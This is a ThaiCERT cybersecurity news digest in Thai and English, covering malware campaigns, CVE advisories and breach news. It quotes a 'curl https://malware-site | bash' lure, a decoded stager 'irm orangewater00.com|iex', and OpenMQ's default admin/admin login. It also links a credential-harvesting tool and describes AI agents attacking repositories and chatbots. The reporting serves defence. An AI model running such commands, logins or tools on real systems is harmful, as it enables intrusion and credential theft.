ศูนย์ประสานการรักษาความมั่นคงปลอดภัยระบบคอมพิวเตอร์แห่งชาติ (ThaiCERT) ได้ติดตามสถานการณ์ด้านความมั่นคงปลอดภัยทางไซเบอร์ พบว่าช่องโหว่บนระบบปฏิบัติการ macOS กำลังเพิ่มสูงขึ้นอย่างต่อเนื่อง ล่าสุดนักวิจัยด้านความปลอดภัยพบแคมเปญแพร่กระจายมัลแวร์ "SHub Stealer" ที่แฝงตัวมาในคราบโปรแกรมทำความสะอาดเครื่องยอดฮิตอย่าง CleanMyMac เพื่อมุ่งเป้าขโมยสินทรัพย์ดิจิทัลและข้อมูลสำคัญ ซึ่งสอดคล้องกับเทรนด์การโจมตีทางไซเบอร์ที่มุ่งเป้าไปที่กระเป๋าเงินดิจิทัลทั่วโลก

1. กลุ่มเป้าหมายหลักที่ตกอยู่ในความเสี่ยง
   ผู้ใช้งาน Mac ที่กำลังมองหาโปรแกรมทำความสะอาดระบบ (System Cleanup) และผู้ที่ถือครองคริปโตเคอร์เรนซี (Cryptocurrency) ผ่านแอปพลิเคชันอย่าง Exodus, Ledger หรือ Trezor
   สาเหตุที่กลุ่มนี้มีความเสี่ยงสูง เนื่องจากแฮกเกอร์จงใจออกแบบมัลแวร์มาเพื่อเจาะกระเป๋าเงินดิจิทัลโดยเฉพาะ รวมถึงมุ่งเป้าไปที่การดึงข้อมูลรหัสผ่านที่ถูกบันทึกไว้ใน macOS Keychain

2. รูปแบบการโจมตีที่พบ
   2.1 การหลอกลวงให้ผู้ใช้รันสคริปต์อันตรายด้วยตนเอง เว็บไซต์ปลอมจะหลอกให้เหยื่อคัดลอกคำสั่งไปรันใน Terminal ด้วยตัวเอง ซึ่งวิธีการนี้ทำให้ตัวมัลแวร์สามารถข้ามระบบรักษาความปลอดภัย (Gatekeeper) ของ Mac ไปได้อย่างแนบเนียน
   2.2 หลบเลี่ยงการตรวจจับ มัลแวร์จะเช็กภาษาของแป้นพิมพ์ หากพบว่าเป็นภาษารัสเซียจะหยุดทำงานทันที เพื่อหลบหนีการตรวจสอบและลดความสนใจจากหน่วยงานบังคับใช้กฎหมายในพื้นที่ของผู้พัฒนา
   2.3 ดักขโมยข้อมูลสำคัญ มัลแวร์จะแสดงหน้าต่างปลอมเพื่อหลอกให้กรอกรหัสผ่านของเครื่อง หากผู้ใช้หลงเชื่อ แฮกเกอร์จะสามารถเข้าถึงรหัสผ่านทั้งหมดที่เก็บไว้ใน Keychain รวมถึงข้อมูล Wi-Fi ได้ทันที
   2.4 แทรกแซงกระเป๋าเงินคริปโต ตัวมัลแวร์จะเข้าไปปรับเปลี่ยนแอปฯ กระเป๋าเงินยอดนิยม เพื่อสร้างหน้าต่างหลอกให้กรอก "วลีกู้คืน (Seed Phrase)" หากป้อนข้อมูลลงไป แฮกเกอร์จะสามารถสูบเงินคริปโตออกไปได้ทั้งหมด
   2.5 แฝงตัวถาวรแนบเนียน มัลแวร์จะสร้างการทำงานเบื้องหลัง (LaunchAgent) โดยใช้ชื่อไฟล์เลียนแบบระบบอัปเดตที่ถูกต้องของ Google (Keystone) เพื่อแอบส่งข้อมูลกลับไปหาแฮกเกอร์ในทุกๆ นาที

ความน่ากลัวของมัลแวร์ "SHub Stealer" คือแฝงตัวอยู่ในเครื่องของเราได้โดยปลอมแปลงตัวเองเป็นไฟล์อัปเดตของ Google การทำแบบนี้ช่วยให้สามารถทำงานอยู่เบื้องหลัง และคอยส่งข้อมูลกลับไปหาแฮกเกอร์ได้อย่างต่อเนื่อง ทำให้แฮกเกอร์ควบคุมเครื่องและดึงข้อมูลเพิ่มเติมได้ตลอดเวลา

3. วิธีป้องกันตัวและรับมือการโจมตี
   3.1 ดาวน์โหลด ซอฟต์แวร์จากเว็บไซต์ทางการ (Official) ของผู้พัฒนา หรือโหลดผ่าน Mac App Store เท่านั้น
   3.2 ตรวจสอบ URL ของเว็บไซต์ให้แน่ใจทุกครั้งว่าสะกดถูกต้อง ไม่มีตัวอักษรผิดเพี้ยนก่อนกดโหลดโปรแกรมใดๆ
   3.3 หลีกเลี่ยง การก๊อปปี้คำสั่งจากเว็บไซต์ที่ไม่คุ้นเคยไปรันใน Terminal เด็ดขาด หากคุณไม่เข้าใจว่าคำสั่งนั้นทำงานอย่างไร
   3.4 เฝ้าระวัง หน้าต่าง Pop-up ที่เด้งขึ้นมาขอรหัสผ่านเครื่อง หรือขอ Seed Phrase ของคริปโต หากมีข้อความแปลกๆ หรือสะกดผิดแกรมม่า ห้ามกรอกเด็ดขาด
   3.5 อัปเดตระบบปฏิบัติการ macOS และโปรแกรมแอนตี้ไวรัส (ถ้ามี) ให้เป็นเวอร์ชันล่าสุดอยู่เสมอ เพื่ออุดช่องโหว่ความปลอดภัย

แหล่งอ้างอิง: Hackread (https://dg.th/i7aehpvk1n)
#CyberSecurity #macOS #CleanMyMac #MalwareAlert #CryptoSecurity #SHubStealer #Infostealer

เมื่อวันที่ 9 มีนาคม 2026 Cybersecurity and Infrastructure Security Agency (CISA) ได้เพิ่มช่องโหว่ใหม่ 3 รายการลงในแคตตาล็อก Known Exploited Vulnerabilities (KEV) จากหลักฐานที่พบว่ามีการโจมตีใช้งานจริงแล้ว ดังนี้

• CVE-2021-22054 Omnissa Workspace ONE Server-Side Request Forgery
• CVE-2025-26399 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
• CVE-2026-1603 Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability

ทาง CISA จะปรับปรุงและเพิ่มช่องโหว่ใหม่เข้าสู่แคตตาล็อก KEV อย่างต่อเนื่อง เพื่อให้ครอบคลุมความเสี่ยงที่ตรวจพบจริงในปัจจุบันและอนาคต

อ้างอิง
https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

Industrial Sector

• Portwell Engineering Toolkits
  "Successful exploitation of this vulnerability could allow a local attacker to escalate privileges or cause a denial-of-service condition."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-04
• Labkotec LID-3300IP
  "Successful exploitation of this vulnerability could allow attackers to gain unauthorized control over system operations, leading to disruption of normal functionality and potential safety hazards."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-05
• Mobiliti e-Mobi.hu
  "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-06
• ePower Epower.ie
  "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-07
• Everon OCPP Backends
  "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-08
• Mitsubishi Electric MELSEC iQ-F Series EtherNet/IP Module And Ethernet Module
  "Successful exploitation of these vulnerabilities could allow a remote attacker to cause a denial-of-service condition by continuously sending UDP packets to the affected products."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-62-01
• Hitachi Energy Relion REB500 Product
  "Hitachi Energy is aware of vulnerabilities that affect the Relion REB500 product versions listed in this document. Authenticated users with certain roles can exploit the vulnerabilities to access and modify the directory contents they are not authorized to do so. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-02
• Hitachi Energy RTU500 Product
  "Hitachi Energy is aware of vulnerabilities that affect RTU500 product versions listed in this document. Successful exploitation of these vulnerabilities can result in the exposure of low-value user management information and device outage. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-03
• Delta Electronics CNCSoft-G2
  "Successful exploitation of this vulnerability could result in an attacker achieving remote code execution on the device."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-064-01

New Tooling

• DumpBrowserSecrets – Browser Credential Harvesting With App-Bound Encryption Bypass
  "DumpBrowserSecrets is a post-exploitation credential-harvesting tool from Maldev Academy that extracts secrets across all major browsers from a single Windows executable. It is the successor to their earlier DumpChromeSecrets project, which is now deprecated, and extends coverage from Chrome alone to the full range of Chromium-based and Gecko-based browsers in common enterprise use."
  https://www.darknet.org.uk/2026/03/dumpbrowsersecrets-browser-credential-harvesting-with-app-bound-encryption-bypass/
  https://github.com/Maldev-Academy/DumpBrowserSecrets

Vulnerabilities

• CISA Adds Three Known Exploited Vulnerabilities To Catalog
  "CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
  CVE-2021-22054 Omnissa Workspace ONE Server-Side Request Forgery
  CVE-2025-26399 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
  CVE-2026-1603 Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability"
  https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog
• Partnering With Mozilla To Improve Firefox’s Security
  "AI models can now independently identify high-severity vulnerabilities in complex software. As we recently documented, Claude found more than 500 zero-day vulnerabilities (security flaws that are unknown to the software’s maintainers) in well-tested open-source software. In this post, we share details of a collaboration with researchers at Mozilla in which Claude Opus 4.6 discovered 22 vulnerabilities over the course of two weeks. Of these, Mozilla assigned 14 as high-severity vulnerabilities—almost a fifth of all high-severity Firefox vulnerabilities that were remediated in 2025. In other words: AI is making it possible to detect severe security vulnerabilities at highly accelerated speeds."
  https://www.anthropic.com/news/mozilla-firefox-security
  https://securityaffairs.com/189131/ai/anthropic-claude-opus-ai-model-discovers-22-firefox-bugs.html
• AI Vs AI: Agent Hacked McKinsey's Chatbot And Gained Full Read-Write Access In Just Two Hours
  "Researchers at red-team security startup CodeWall say their AI agent hacked McKinsey's internal AI platform and gained full read and write access to the chatbot in just two hours. It's yet another indicator that agentic AI is becoming a more effective tool for conducting cyberattacks, including those against other AI systems. This attack wasn’t conducted with malicious intent. However, threat hunters tell us that miscreants are increasingly using agents in real-world attacks, indicating that machine-speed intrusions aren't going away."
  https://www.theregister.com/2026/03/09/mckinsey_ai_chatbot_hacked/

Malware

• New A0Backdoor Linked To Teams Impersonation And Quick Assist Social Engineering
  "BlueVoyant Security Operations Center (SOC) and Threat Fusion Cell (TFC) continue to track an activity cluster that uses email bombing and IT-support impersonation over Microsoft Teams to obtain Quick Assist access, then pivot to a deeper attack. This research shows that once on the victim’s host, the actors sideload a malicious DLL to deliver a new backdoor BlueVoyant has dubbed the A0Backdoor. The malware’s loader exhibits anti-sandbox evasion, and the campaign’s command-and-control appears to have pivoted to a covert DNS mail exchange-based channel that confines endpoint traffic to trusted recursive resolvers."
  https://www.bluevoyant.com/blog/new-a0backdoor-linked-to-teams-impersonation-and-quick-assist-social-engineering
  https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/
• ShinyHunters Claims Ongoing Salesforce Aura Data Theft Attacks
  "Salesforce is warning customers that hackers are targeting websites with misconfigured Experience Cloud platforms that give guest users access to more data than intended. However, the ShinyHunters extortion gang claims to be actively exploiting a new bug to steal data from instances. Salesforce has shared guidance for its customers to defend against hackers actively targeting the /s/sfsites/aura API endpoint on misconfigured Experience Cloud instances that gives guest users access to more data than intended. The company states that attackers are deploying a modified version of AuraInspector, an open-source auditing tool developed by Mandiant, which can help administrators identify access control misconfigurations within the Salesforce Aura framework."
  https://www.bleepingcomputer.com/news/security/shinyhunters-claims-ongoing-salesforce-aura-data-theft-attacks/
  https://www.salesforce.com/blog/protecting-your-data-essential-actions-to-secure-experience-cloud-guest-user-access/
  https://www.theregister.com/2026/03/09/shinyhunters_claims_more_highprofile_victims/
• FBI Warns Of Phishing Attacks Impersonating US City, County Officials
  "The Federal Bureau of Investigation (FBI) warns that criminals are impersonating U.S. officials in phishing attacks targeting businesses and individuals who request city and county planning and zoning permits. In a public service announcement published on Monday, the bureau said that the criminals behind this campaign are identifying potential victims using publicly available information, which also makes their malicious messages seem legitimate and helps them trick suspicious targets."
  https://www.bleepingcomputer.com/news/security/fbi-warns-of-phishing-attacks-impersonating-us-city-county-officials/
  https://www.ic3.gov/PSA/2026/PSA260309
  https://securityaffairs.com/189165/cyber-crime/fbi-alert-scammers-target-zoning-permit-applicants.html
• China-Nexus Activity Against Qatar Observed Amid Expanding Regional Tensions
  "Since the recent escalation in the Middle East, Check Point Research has observed increased activity by Chinese-nexus APT actors in the region, particularly targeting Qatar. The Chinese-nexus threat actor Camaro Dragon attempted to deploy a variant of PlugX malware against Qatari targets within one day of the launch of Operation Epic Fury and the onset of the escalation in the Middle East. The attackers leveraged the ongoing war in the Middle East to make their lures more credible and engaging, demonstrating the ability to rapidly adapt to major developments and breaking news."
  https://blog.checkpoint.com/research/china-nexus-activity-against-qatar-observed-amid-expanding-regional-tensions/
  ACSC, NCSC, And CERT Tonga Warn Of Growing INC Ransom Activity Targeting Healthcare And Organizations Across Australia, New Zealand, And Pacific States.
  "Cybersecurity agencies across the Pacific region are sharing concerns about the ransomware group INC Ransom’s expanding activities and the growing influence of its affiliate network. A joint advisory issued by the Australian Cyber Security Centre (ACSC), National Computer Emergency Response Team Tonga (CERT Tonga), and the New Zealand National Cyber Security Centre (NCSC) highlights how the INC Ransom ecosystem has become an active threat to organizations in Australia, New Zealand, and Pacific Island states."
  https://cyble.com/blog/inc-ransom-attacks-australia-new-zealand/
• Hackerbot-Claw: Adversarial Agent Targets Top GitHub Repos
  "Pillar Security researchers analyzed the hackerbot-claw campaign, we named “Chaos Agent” - the first publicly documented campaign where an AI agent, operating on natural-language instructions, conducted an end-to-end attack against production open-source infrastructure. Within 37 hours, hackerbot-claw identified vulnerable open-source projects, crafted targeted exploits, compromised CI/CD pipelines, and published a malicious extension that turned developers' own AI coding tools into credential-stealing accomplices."
  https://www.pillar.security/blog/hackerbot-claw-adversarial-agent-targets-top-github-repos
  https://hackread.com/ai-bot-hackerbot-claw-microsoft-datadog-github-repos/
• Someone Else’s SIEM: A Threat Actor Abuses Another Free Trial
  "Huntress discovered a threat actor was exploiting vulnerabilities (like SolarWinds Web Help Desk) and exfiltrating victim data to a free trial instance of Elastic Cloud SIEM. The actor used the SIEM for victim triage, and the infrastructure revealed details about their campaign, including disposable email services (quieresmail.com), connections to a Russian-registered temporary email network (firstmail.ltd), use of a SAFING_VPN tunnel, and a possible connection to other opportunistic attacks against Microsoft SharePoint and other software. The instance has since been taken down."
  https://www.huntress.com/blog/threat-actor-abuses-elastic-cloud-siem
  https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/
• Fake Claude Code Install Pages Hit Windows And Mac Users With Infostealers
  "Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter.​ That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator."
  https://www.malwarebytes.com/blog/news/2026/03/fake-claude-code-install-pages-hit-windows-and-mac-users-with-infostealers
• Quiz Sites Trick Users Into Enabling Unwanted Browser Notifications
  "Our support team flagged a number of customers who suspected their device might be infected with malware, but Malwarebytes scans came up empty. When the customers provided screenshots, our Malware Removal Support team quickly recognized the format as web push notifications. The reason the scans came up clean is that these notifications aren’t malware on the device. They’re browser notifications from websites that trick users into clicking “Allow.”"
  https://www.malwarebytes.com/blog/threat-intel/2026/03/quiz-sites-trick-users-into-enabling-unwanted-browser-notifications
• GhostClaw Unmasked: A Malicious Npm Package Impersonating OpenClaw To Steal Everything
  "The JFrog Security research team has identified a live malicious npm package named @openclaw-ai/openclawai. This package masquerades as a legitimate CLI tool called "OpenClaw Installer" while deploying a multi-stage infection chain that steals system credentials, browser data, crypto wallets, SSH keys, Apple Keychain databases, iMessage history, and more - then installs a persistent RAT with full remote access capabilities including a SOCKS5 proxy and live browser session cloning. The attack is notable for its broad data collection, its use of social engineering to harvest the victim's system password, and the sophistication of its persistence and C2 infrastructure. Internally, the malware identifies itself as GhostLoader."
  https://research.jfrog.com/post/ghostclaw-unmasked/
  https://thehackernews.com/2026/03/malicious-npm-package-posing-as.html
• From a Sophisticated Browser-Extension Supply-Chain Compromise To a VibeCoded Twist: A Chrome Extension As The Initial Access Vector For a Broader Malware Chain
  "A formerly legitimate Featured Chrome extension (ShotBird) was turned into a remote-controlled malware channel after an apparent ownership transfer. The malicious version beaconed to attacker infrastructure, received callback-delivered JavaScript tasks, stripped browser security headers, injected fake Chrome update lures, and captured sensitive form data. In the observed Windows file-delivery path, victims were pushed to run googleupdate.exe, a fake update wrapper that carried a real Google-signed ChromeSetup.exe alongside a malicious psfx.msi stager. Host-side PowerShell 4104 logs later confirmed execution of the decoded stager irm orangewater00.com|iex and allowed reconstruction of a larger second stage with ETW suppression, Credential Manager access, Chromium data targeting, and upload logic. In short: this was not just extension abuse, but a browser-to-endpoint compromise chain with likely credential-theft capability."
  https://monxresearch-sec.github.io/shotbird-extension-malware-report/
  https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html

Breaches/Hacks/Leaks

• Ericsson US Discloses Data Breach After Service Provider Hack
  "Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to an undisclosed number of employees and customers after hacking one of its service providers. Headquartered in Stockholm and founded in 1876, the parent company is a communications tech leader with nearly 90,000 employees worldwide. In data breach notification letters sent to affected individuals and filed with the California Attorney General on Monday, Ericsson said that a service provider who was storing personal data for employees and customers discovered a breach on April 28, 2025."
  https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/
• EV Charger Biz ELECQ Zapped By Ransomware Crooks, Customer Contact Data Stolen
  "ELECQ, maker of smart electric vehicle (EV) chargers, is warning customers that their personal details may have been stolen in a ransomware attack that encrypted and copied user data from its cloud systems. In a notice sent to customers on Monday and seen by The Register, the EV charging outfit said that it detected "unusual activity" on its AWS cloud platform on March 7 and quickly discovered that attackers had launched a ransomware attack against parts of its infrastructure."
  https://www.theregister.com/2026/03/09/ransomware_crooks_hit_ev_charger/

General News

• Google: Cloud Attacks Exploit Flaws More Than Weak Credentials
  "Hackers are increasingly exploiting newly disclosed vulnerabilities in third-party software to gain initial access to cloud environments, with the window for attacks shrinking from weeks to just days. At the same time, the use of weak credentials or misconfigurations has dropped significantly in the second half of 2025, Google notes in a report highlighting the trends on threats to cloud users. According to the report, incident responders determined that bug exploits were the primary access vector in 44.5% of the investigated intrusions, while credentials were responsible for 27% of the breaches."
  https://www.bleepingcomputer.com/news/security/google-cloud-attacks-exploit-flaws-more-than-weak-credentials/
  https://services.google.com/fh/files/misc/cloud_threat_horizons_report_h12026.pdf
• Dutch Govt Warns Of Signal, WhatsApp Account Hijacking Attacks
  "Russian state-sponsored hackers have been linked to an ongoing Signal and WhatsApp phishing campaign targeting government officials, military personnel, and journalists to gain access to sensitive messages. This report comes from the Netherlands Defence Intelligence and Security Service (MIVD) and the Netherlands General Intelligence and Security Service (AIVD), who confirmed that Dutch government employees have been targeted in the attacks. The Dutch intelligence agencies say the operation relies on phishing and social-engineering techniques that abuse legitimate authentication features to take over accounts and covertly monitor new messages."
  <1https://www.bleepingcomputer.com/news/security/dutch-govt-warns-of-signal-whatsapp-account-hijacking-attacks/>
  https://therecord.media/russian-hackers-target-signal-whatsapp-warn-dutch-intelligence-agencies
  https://hackread.com/dutch-intel-russia-hackers-hijack-signal-whatsapp-attacks/
  https://securityaffairs.com/189156/intelligence/russia-linked-hackers-target-signal-whatsapp-of-officials-globally.html
  https://www.theregister.com/2026/03/09/dutch_spies_say_russian_cybercrims/
  https://www.helpnetsecurity.com/2026/03/09/signal-whatsapp-accounts-russian-hackers/
• Are We Ready For Auto Remediation With Agentic AI?
  "The key to security program effectiveness is optimizing remediation. This has become increasingly difficult as organizations strive to modernize their processes with innovative technologies, including artificial intelligence (AI). As employees gain capabilities to collaborate and work faster, cyber assets and attack surfaces proliferate, making it difficult for security teams to take the needed actions to mitigate risk. Now, as organizations look to leverage agentic AI in areas such as software development, instead of incrementally increasing productivity, we are expecting exponential gains in productivity, further proliferating attack surfaces. At the same time, the threat landscape will also evolve rapidly, with attackers taking advantage of AI to scale their attacks."
  https://www.darkreading.com/application-security/auto-remediation-agentic-ai
• More AI Tools, More Burnout! New Research Explains Why
  "Workflows built around multiple AI agents and constant tool switching are adding cognitive strain across large enterprises. A recent Harvard Business Review analysis describes this pattern as “AI brain fry,” a form of mental fatigue tied to intensive use and oversight of AI systems. Employees increasingly manage clusters of agents that generate code, synthesize information, and produce drafts at high speed. Performance systems in some organizations reward activity metrics such as token consumption and AI output volume. This structure pushes workers to monitor more systems and outcomes within the same workday."
  https://www.helpnetsecurity.com/2026/03/09/harvard-business-review-ai-workplace-fatigue-report/
• Ghanaian Pleads Guilty To Role In $100m Romance Scam
  "A Ghanaian national had pleaded guilty to scamming countless victims as part of a global fraud ring that engaged in romance fraud and business email compromise (BEC). The Justice Department announced the guilty plea for Derrick Van Yeboah, 40, late last week. The fraud operation, which was primarily based in Ghana, is said to have caused over $100m in losses, 10% of which were pinned on Van Yeboah. As per typical scams of this kind, he impersonated romantic partners in online communications with vulnerable victims."
  https://www.infosecurity-magazine.com/news/ghanaian-pleads-guilty-100m/
• Cloud Threat Horizons Report H1 2026
  "The Google Cloud Threat Horizons Report provides decision-makers with strategic intelligence on threats to not just Google Cloud, but all cloud service providers. The report focuses on recommendations for mitigating risks and improving cloud security for leaders and practitioners. The report is informed by Google Cloud’s Office of the CISO, Google Threat Intelligence Group (GTIG), Mandiant Consulting, and various Google Cloud intelligence, security, and product teams."
  https://cloud.google.com/security/report/resources/cloud-threat-horizons-report-h1-2026
  https://thehackernews.com/2026/03/unc4899-used-airdrop-file-transfer-and.html
• White House Cyber Strategy Prioritizes Offense
  "The Trump administration released a notably hawkish vision of American cyber power that blends deregulation at home with deterrence and offense against adversaries abroad. In a relatively brief seven-page document published on Friday, President Trump's Cyber Strategy for America framed cybersecurity both as a defensive IT challenge and as a strategic domain where the US must assert dominance amid intensifying geopolitical rivalries. American response to cyber threats will not be confined to the cyber realm, the document warned."
  https://www.darkreading.com/cybersecurity-operations/white-house-cyber-strategy-prioritizes-offense
  https://www.whitehouse.gov/wp-content/uploads/2026/03/President-Trumps-Cyber-Strategy-for-America.pdf
  https://therecord.media/trump-cyber-strategy-released-regulations
  https://www.bankinfosecurity.com/trump-pledges-action-on-cybercrime-cyberspace-threats-a-30942
  https://www.infosecurity-magazine.com/news/usa-unveils-new-cyber-strategy/
  https://www.securityweek.com/us-cyber-strategy-targets-adversaries-critical-infrastructure-and-emerging-technologies/

อ้างอิง
Electronic Transactions Development Agency (ETDA)

ศูนย์ประสานการรักษาความมั่นคงปลอดภัยระบบคอมพิวเตอร์แห่งชาติ (ThaiCERT) ติดตามสถานการณ์ภัยคุกคามทางไซเบอร์ พบรายงานภัยคุกคามทางไซเบอร์ โดยการใช้ Social Engineering ผ่านระบบสนทนาใน Microsoft Teams และเปิดช่องทางการเข้าถึงเครื่องคอมพิวเตอร์ จากนั้นผู้โจมตีจะติดตั้งมัลแวร์ประเภท Backdoor ที่เรียกว่า A0Backdoor

1. รายละเอียดเหตุการณ์
   • ผู้โจมตีจะส่งอีเมลสแปมจำนวนมากไปยังเหยื่อ เพื่อสร้างสถานการณ์ว่าระบบอีเมลของเหยื่อมีปัญหา และจะติดต่อผ่าน Microsoft Teams โดยแอบอ้างเป็นเจ้าหน้าที่ฝ่าย IT เพื่อเปิดช่องทางการเข้าถึงเครื่องคอมพิวเตอร์

2. พฤติกรรมการโจมตี
   • ผู้โจมตีจะส่งอีเมลสแปมจำนวนมากไปยังเหยื่อ เพื่อสร้างสถานการณ์ว่าระบบอีเมลของเหยื่อมีปัญหา และจะติดต่อผ่าน Microsoft Teams โดยแอบอ้างเป็นเจ้าหน้าที่ฝ่าย IT
   • หลอกให้เหยื่อเปิดใช้งาน Quick Assist เพื่อให้ผู้โจมตีเข้าควบคุมเครื่อง
   • หลังจากเข้าควบคุมครื่องได้แล้ว ผู้โจมตีจะติดตั้งไฟล์ (MSI) ที่เป็นอันตราย โดยไฟล์ดังกล่าวถูกโฮสต์ไว้บนคลาวด์ของ Microsoft ที่เป็นบัญชีส่วนบุคคลของผู้โจมตี
   • ไฟล์ดังกล่าวจะปลอมแปลงเป็นส่วนประกอบของ Microsoft Teams และ CrossDeviceService ซึ่งเป็นเครื่องมือของ Windows
   • เมื่อทำการติดตั้งแล้ว มัลแวร์ A0Backdoor จะเปิดช่องทางให้ผู้โจมตีเข้าควบคุมระบบ

3. แนวทางป้องกันและลดความเสี่ยง
   • กำหนดนโยบายจำกัดการติดต่อจาก บัญชี Microsoft Teams ภายนอกองค์กร
   • หลีกเลี่ยงการเปิดใช้งาน Quick Assist หรือ Remote Access
   • ตรวจสอบและติดตามการติดตั้งไฟล์ MSI หรือโปรแกรมที่ไม่ได้รับอนุญาต
   • จำกัดสิทธิ์การติดตั้งซอฟต์แวร์ของผู้ใช้งานทั่วไป
   • ใช้งานระบบ Endpoint Detection and Response (EDR) หรือระบบตรวจจับภัยคุกคามเพื่อเฝ้าระวังพฤติกรรมผิดปกติ

4. แหล่งอ้างอิง (References)
   • https://dg.th/ty86mhid20

หากมีบุคคลจะติดต่อผ่าน Microsoft Teams และอ้างว่าเป็นเจ้าหน้าที่ฝ่าย IT ควรตรวจสอบตัวตนผ่านช่องทางภายในองค์กรก่อนทุกครั้ง

️ ThaiCERT ได้ติดตามสถานการณ์ภัยคุกคามทางไซเบอร์ และพบประกาศด้านความมั่นคงปลอดภัยจาก WatchGuard เกี่ยวกับช่องโหว่ CVE-2026-3342 ซึ่งเป็นช่องโหว่ประเภท Out-of-bounds Write ใน WatchGuard Fireware OS โดยอาจเปิดโอกาสให้ ผู้โจมตีที่ยืนยันตัวตนแล้วและมีสิทธิ์ผู้ดูแลระดับ privileged administrator สามารถใช้ management interface ที่เปิดเข้าถึงได้ เพื่อ รันโค้ดด้วยสิทธิ์ root บนอุปกรณ์ที่ได้รับผลกระทบ ส่งผลให้มีความเสี่ยงสูงต่อการถูกยึดระบบหรือแก้ไขการตั้งค่าความมั่นคงปลอดภัยของอุปกรณ์.

1. รายละเอียดช่องโหว่
   CVE-2026-3342 - Out-of-bounds Write in WatchGuard Fireware OS (CVSS v3.1: 7.2)
   ช่องโหว่นี้เกิดจากการเขียนข้อมูลเกินขอบเขตหน่วยความจำและอาจทำให้ผู้ดูแลระบบที่ผ่านการยืนยันตัวตนแล้ว สามารถ execute arbitrary code with root permissions ผ่าน exposed management interface ได้

2. ผลิตภัณฑ์ที่ได้รับผลกระทบ

• Fireware OS 11.9 ถึง 11.12.4_Update1
• Fireware OS 12.0 ถึง 12.11.7
• Fireware OS 2025.1 ถึง 2026.1.1

3. แนวทางการแก้ไข

• อัพเดท Fireware OS 2026.1.2
• อัพเดท Fireware OS 12.11.8
• สำหรับ Fireware OS 12.5.x (T15 & T35 models) ให้อัปเดตเป็น 12.5.17
• สำหรับ Fireware OS 11.x ผู้ผลิตระบุว่าเป็น End of Life แล้ว จึงควรวางแผนอัปเกรดหรือเปลี่ยนทดแทนโดยเร็ว.

4. หากยังไม่สามารถอัปเดตได้ ควรดำเนินการดังนี้
   ไม่มี workaround สำหรับช่องโหว่นี้ควรรีบดำเนินการอัพเดทโดยด่วน

5. แหล่งอ้างอิง

• https://dg.th/m3bh0e9pfd
• https://dg.th/ehtnqcjbpk

️ ThaiCERT ได้ติดตามสถานการณ์ภัยคุกคามทางไซเบอร์ และพบประกาศด้านความปลอดภัยเกี่ยวกับช่องโหว่ CVE-2026-22886 ซึ่งกระทบต่อ Eclipse OpenMQ โดยเป็นปัญหาการใช้ ข้อมูลรับรองเริ่มต้น (default credentials) ใน TCP-based management service ชื่อ imqbrokerd ทำให้ผู้โจมตีที่สามารถเข้าถึงพอร์ตของบริการนี้ สามารถเข้าสู่ระบบด้วยบัญชีผู้ดูแลเริ่มต้น admin/admin และเข้าควบคุมความสามารถด้านการบริหารจัดการของระบบได้ทั้งหมด

1. รายละเอียดช่องโหว่
   CVE-2026-22886 - Use of Default Credentials / Default Password (CVSS v3.1: 9.8)
   ช่องโหว่นี้เกิดจากระบบมีบัญชีผู้ดูแลค่าเริ่มต้นและไม่บังคับเปลี่ยนรหัสผ่านเมื่อใช้งานครั้งแรกส่งผลให้รหัสผ่านเริ่มต้นยังคงใช้ได้อย่างต่อเนื่อง หากผู้โจมตีเข้าถึงพอร์ตของบริการ imqbrokerd ได้ ก็สามารถยืนยันตัวตนเป็นผู้ดูแลและเข้าควบคุมฟังก์ชันการบริหารจัดการของ broker ได้

2. ผลิตภัณฑ์ที่ได้รับผลกระทบ
   Eclipse OpenMQ ทุกเวอร์ชัน

3. แนวทางการแก้ไข

• เปลี่ยนรหัสผ่านเริ่มต้นของ Eclipse OpenMQ

4. แนวทางลดความเสี่ยง

• ตรวจสอบทันทีว่ามีการเปิดใช้บริการ imqbrokerd หรือไม่
• ปิด service ดังกล่าวหากไม่จำเป็น
• หากจำเป็นต้องใช้งานให้เปลี่ยนรหัสผ่านเริ่มต้นของบัญชีผู้ดูแลทันทีเป็นรหัสผ่านที่รัดกุมและไม่ซ้ำ
• จำกัดการเข้าถึงพอร์ตให้เฉพาะผู้ดูแลที่ได้รับอนุญาต

5.แหล่งอ้างอิง

• https://dg.th/1vxqlprwea
• https://dg.th/fsydbjm0rh

Industrial Sector

• APT And Financial Attacks On Industrial Organizations In Q4 2025
